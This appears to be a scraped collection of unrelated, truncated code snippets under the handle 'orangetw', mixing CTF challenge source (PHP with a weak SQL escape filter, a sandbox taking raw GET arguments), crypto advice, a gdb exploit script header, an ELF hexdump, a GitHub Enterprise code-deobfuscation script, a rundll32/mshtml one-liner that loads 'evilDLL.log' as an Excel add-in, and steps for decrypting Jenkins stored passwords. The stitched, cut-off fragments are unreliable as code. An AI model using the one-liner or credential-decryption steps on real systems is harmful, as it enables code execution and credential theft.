orangetw

#!/usr/bin/env python
#coding=utf-8
import web, settings

urls = (
    '/uploads/(.*)', 'download',
    '([a-z0-9\/]*)', 'dispatcher'
    )

class dispatcher:

orangetw

**Encrypting data** (*Was: AES-CTR with HMAC*): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM. 

*You care about this if: you're hiding information from users or the network.*

All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated.

*Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.*

**Symmetric key length** (*Was: Use 256 bit keys*

orangetw

# coding: UTF-8
# 
import sys
import gdb
import socket
import struct
import binascii

DEBUG = False

orangetw

<?php 
    include "config.php";

    mysql_connect($dbhost, $dbuser, $dbpass);
    mysql_select_db($dbname);

    function escape($str){
        $str = strtolower($str);
        $str = str_replace("'", "", $str);
        $str = str_replace("\\", "", $str);

orangetw

0000000: 7f45 4c46 0201 0100 0000 0000 0000 0000  .ELF............
0000010: 0200 3e00 0100 0000 2008 4000 0000 0000  ..>..... .@.....
0000020: 4000 0000 0000 0000 c811 0000 0000 0000  @...............
0000030: 0000 0000 4000 3800 0900 4000 1c00 1b00  ....@.8...@.....
0000040: 0600 0000 0500 0000 4000 0000 0000 0000  ........@.......
0000050: 4000 4000 0000 0000 4000 4000 0000 0000  @.@.....@.@.....
0000060: f801 0000 0000 0000 f801 0000 0000 0000  ................
0000070: 0800 0000 0000 0000 0300 0000 0400 0000  ................
0000080: 3802 0000 0000 0000 3802 4000 0000 0000  8.......8.@.....
0000090: 3802 4000 0000 0000 1c00 0000 0000 0000  8.@.............

orangetw

<?php
    /*
        sqlpwn by orange
        Don't brute force or you will be banned !
    */

    session_start();
    error_reporting(0);

    include "template.html";

orangetw

<?php
    highlight_file(__FILE__);

    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);

    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){

orangetw

#!/usr/bin/sudo sh

## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.

## From `strings ruby_concealer.so`:
##
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
##
## Well, good, as long as its not intended to discourage *me* from doing this!

orangetw

REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();

orangetw

#To Decrypt Jenkins Password from credentials.xml
#<username>jenkins</username>
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase>


#go to the jenkins url 
http://jenkins-host/script

#In the console paste the script
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J'